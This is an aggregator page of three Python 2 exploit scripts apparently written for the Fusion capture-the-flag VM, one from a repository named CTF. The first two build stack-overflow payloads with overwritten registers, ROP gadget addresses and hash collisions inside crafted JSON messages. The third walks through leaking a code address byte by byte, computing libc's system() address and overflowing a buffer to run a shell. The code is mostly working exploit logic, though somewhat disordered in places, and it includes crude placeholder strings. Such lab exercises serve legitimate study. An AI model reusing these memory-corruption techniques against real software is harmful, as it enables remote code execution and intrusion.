Esempio n. 1
0
def main(fd):
    token = core.rx_until(fd, "\n")
    #token = token.replace("\"", "")[:-1]  #strip newline
    token = json.loads(token)
    print "Token: {0}".format(token)
    EBX = 'NNNN'
    EBP = 'DDDD'
    ESI = 'BBBB'
    EDI = 'CCCC'
    EIP = 'EEEE'
    BUF = 'AAAABBBBCCCCDDD'+ EBX + ESI + EDI + EBP + EIP
    BUF += 'MMMM'
    #BUF += 'A' * 500

    #tags_dict = {'serverip':'192.168.136.100:6969', 'tags':['fuckyou']*128, 'contents':'penis', 'title':'fastcars', 'pad':0}
    #tags_dict = {'serverip':'192.168.136.100:6969', 'tags':['AAAA', 'BBBB'], 'contents':'penis', 'title':'A\uAAAA'*64, 'pad':0}
    tags_dict = {'serverip':'192.168.136.100:6969', 'tags':['AAAA', 'BBBB'], 'contents':'\uCCCC', 'title':'A'*127+'\uAAAA' + BUF, 'pad':0}
    # JMP ESP FF e4
    #define __NR_mprotect           125

    start_t = time.time()                                        # gContents                       read@plt             srand plt           ???
    msg = generate_collision(token, tags_dict, struct.pack('<I', 0x0804bdf4), struct.pack('<I', 0x804bd38))#0x8048c20))#0x08049387))#0x0804a933))
    print "Elapsed Time: {0}s".format(time.time()-start_t)
    fd.send(msg)
    
    print "Msg: {0}".format(msg)
    print "Note that sockets have been disconnected!"
Esempio n. 2
0
def main(fd):
    token = core.rx_until(fd, "\n")
    #token = token.replace("\"", "")[:-1]  #strip newline
    token = json.loads(token)
    print "Token: {0}".format(token)
    EBX = struct.pack('<I', (READ_JUMP_SLOT - 0x5d5b04c4) & 0xffffffff)
    EBX = struct.pack("<I", 0xaaa9b874)
    EBP = 'CCCC'
    ESI = 'ESII'
    EDI = 'EDII'
    EIP = 'AAAA'
    EIP = struct.pack("<I",0x080493fe)
    CONTENTS = 'FFFF'


    BUF = ''.ljust(127, 'A') + '\\\uAAAA'
    BUF += 'AAAABBBBCCCCDDD' + EBX + ESI + EDI + EBP
    # Set Up EAX with our offset for the next step
    BUF += EIP
    SUBoff = 0x4f960
    ADDoff = 0xb745d8e0 # take plt read value and add 0xf*8 + 1 to get the ADDoff
    # change added offset of ebx by: 0x5d5b04c4 
    # 0x080493fe : add dword ptr [ebx + 0x5d5b04c4], eax ; ret
    # 0xaaa9b874 is ebx
    # eax should be located at ADDoff

    # 0x08049b4f is eip
    # 0x08049b4f : pop eax ; add esp, 0x5c ; ret






    json_string = '{"contents": "%s", "serverip": "192.168.56.101:6969", "tags": ["AAAA", "BBBB"], "title": "' % CONTENTS + BUF +'"}'

    start_t = time.time()
    msg = generate_collision(token, json_string)
    print "Elapsed Time: {0}s".format(time.time()-start_t)
    raw_input('GO?')


    fd.send(msg)
    print "Msg: {0}".format(msg)
    print "Note that sockets have been disconnected!"
Esempio n. 3
0
File: l05.py Progetto: jonobrien/CTF
def main(ip, port):
    msg = "The first thing we're going to do is crash level05 " \
          "in the fusion VM.  We're doing this because we need "\
          "stacks to be reset to a known state."
    print msg
    fd = core.attach(ip, port, wait=False)
    print core.rx_until(fd, "\n") #Welcome to level05

    #crash the program first!l
    crash_l05(fd)
    fd.close()
    print "* Level05 crashed & reset"



    #Senddb has an overflow-vuln (line 103)
    #Use 'nc -lu -p 1337' to monitor the UDP output
    #senddb(fd, "192.168.136.100", 1337)

    #free(0xb95c4850) - twice, but cheated to obtain
    #is this address leaked anywhere?

    #segfault @ 0x41414141
    #vuln in for loop in get_and_hash
    #checkname(fd, "A"*48)

    msg = "We're going to form two connections to level05 now. "\
          "Thanks to libtask, each connection has its own stack, "\
          "so we don't need to worry about different commands "\
          "altering the layout of our target stack.  We are going "\
          "to create a socket for CHECKNAME and ADDREG commands."
    print msg
    raw_input("Press ENTER plz")
    fd = {'checkname':core.attach(ip, port, wait=False), 'addreg':core.attach(ip, port, wait=True)}
    print core.rx_until(fd['checkname'], "\n") #Welcome to level05
    print core.rx_until(fd['addreg'], "\n") #Welcome to level05

    # Test clearing regs
    # x/6xb registrations
    #addreg(fd['addreg'], "", 0xE0, "255.255.255.255", 0)
    #raw_input("press key")
    #addreg(fd['addreg'], "", 0xE0, "0.0.0.0", 0)
    #raw_input("Clear all regs...")
    #clear_all_regs(fd['addreg'], 2)
    #return

    msg = "Now that you've attached gdb to level05, take a look "\
          "at a few things, and set a breakpoint\n"\
          "1 -  (gdb) p checkname+117 #Note the address of checkname+117\n"\
          "2a - (gdb) x/6xb registrations #registrations[0]\n"\
          "2b - (gdb) ptype registrations #Registrations struct\n"\
          "3  - (gdb) b *(get_and_hash+134) #View the checkname buffer\n\n"\
          "Go ahead and continue from here."
    print msg
    raw_input("Press ENTER plz")

    msg = "The behavior of the program's stack seems to be predictable.\n"\
          "The program is about to break on get_and_hash's call to hash. "\
          "Take a look at the buffer that's being passed in:\n"\
          " (gdb) x/12xw *(int*)$esp\n"\
          "Try modifying the script with a few more checkname calls. "\
          "Don't forget to null terminate your inputs. Examine the "\
          "buffers using the gdb command above."
    print msg
    raw_input("Press ENTER plz")

    #Trash
    msg = "The first thing we're going to do with level05 is bring "\
          "the stack into a known state.  This involves sending it a "\
          "checkname request with some dummy data in it.  GDB will "\
          "break just before the call to hash().  Take a look at the "\
          "being passed in.  There's nothing useful this time around. "\
          "That changes on the next call."
    print msg
    raw_input("Press ENTER plz")
    checkname(fd['checkname'], "CCCC\x00") 
    #raw_input("set bp @ get_and_hash+134...")

    msg = "Okay, this is where the magic happens. If you were to "\
          "run checkname a few more times, you'd see TWO stack layouts "\
          "alternate in the buffer to hash().  The first one should "\
          "have a bunch of other stack locations on it.  It's not "\
          "very useful.  The second one looks something like this:\n"\
          " (gdb) x/12xw *(int*)$esp\n"\
          "<4b useless> <4b useless> <4b useless> <checkname117>\n"\
          "<0x00000004>\n"\
          "Our goal is to get the address of CHECKNAME+117.  We want "\
          "that so we can find the load address of the binary, and "\
          "therefore libc's load address.  For some reason, the offset "\
          "between the two has remained constant\n"\
          "By writing a total of 15 bytes in our checkname buffer, "\
          "we're going to see hash's buffer look something like this:\n"\
          "  0x41 0x41 0x41 0x41\n"\
          "  0x41 0x41 0x41 0x41\n"\
          "  0x41 0x41 0x41 0x41\n"\
          "  0x41 0x41 0x41 0xYY where YY is the MSB of checkname117\n"\
          "  0x04 0x00 0x00 0x00 where 04 remains constant (FD?)\n"\
          "So this string: AAAAAAAAAAAAAAAA?\\x04 is going to get passed "\
          "into hash() now."
    print msg
    raw_input("Press ENTER plz")

    msg = "HASH is going to do some shitty shifts and lame xors and "\
          "generate a number between 0 and 127.  CHECKNAME is going to "\
          "see if a REGISTRATION entry has been created at that index. "\
          "CHECKNAME will send a string back to us that ends with "\
          "IS INDEXED ALREADY or IS NOT INDEXED ALREADY.  Using that "\
          "information, we can keep adding REGISTRATION structures via "\
          "ADDREG, and checking to see if we get a hit.\n\n"\
          "Upon getting a hit, we can brute force the hash function to "\
          "identify the unknown byte, which will be from CHECKNAME117. "\
          "I use a few different bytes as my payload buffer because their "\
          "hash function sucks, and collides a lot.  Different payloads "\
          "allow me to see which unknown bytes from checkname117 show up "\
          "more than once, raising their likelihood of being the "\
          "correct byte.\n\nHere we go."
    print msg
    raw_input("Press ENTER plz and find the checkname+117 addr")
    gdb = 'p checkname+117'
    checkname117 = int(checkname117, 16)
    libc_system = checkname117 - 0x16ed15
    bin_base = checkname117 - 0x27c0 - 117l
    id_str = bin_base + 0x69c + 4 # an 'id' str to have system execute


    # executes /bin/bash on new process at leastl
    checkname(fd['checkname'], 'A'*44 + struct.pack("<I", libc_system) + struct.pack("<I", id_str))





    b3 = extract_byte(fd, 15, "")
    print hex(b3)
    clear_all_regs(fd['addreg'])

    b2 = extract_byte(fd, 14, struct.pack("B", b3))
    print hex(b2)

    b1 = extract_byte(fd, 13, struct.pack("BB", b2, b3))
    print hex(b1)

    b0 = extract_byte(fd, 12, struct.pack("BBB", b1, b2, b3))
    print hex(b0)

    checkname117 = "0x"
    checkname117 += str(hex(b3))[-2:]
    checkname117 += str(hex(b2))[-2:]
    checkname117 += str(hex(b1))[-2:]
    checkname117 += str(hex(b0))[-2:]

    print "checkname <+117> @ " + checkname117
    print "libc load offset appears to be checkname117-0x194c55"

    print "Complete"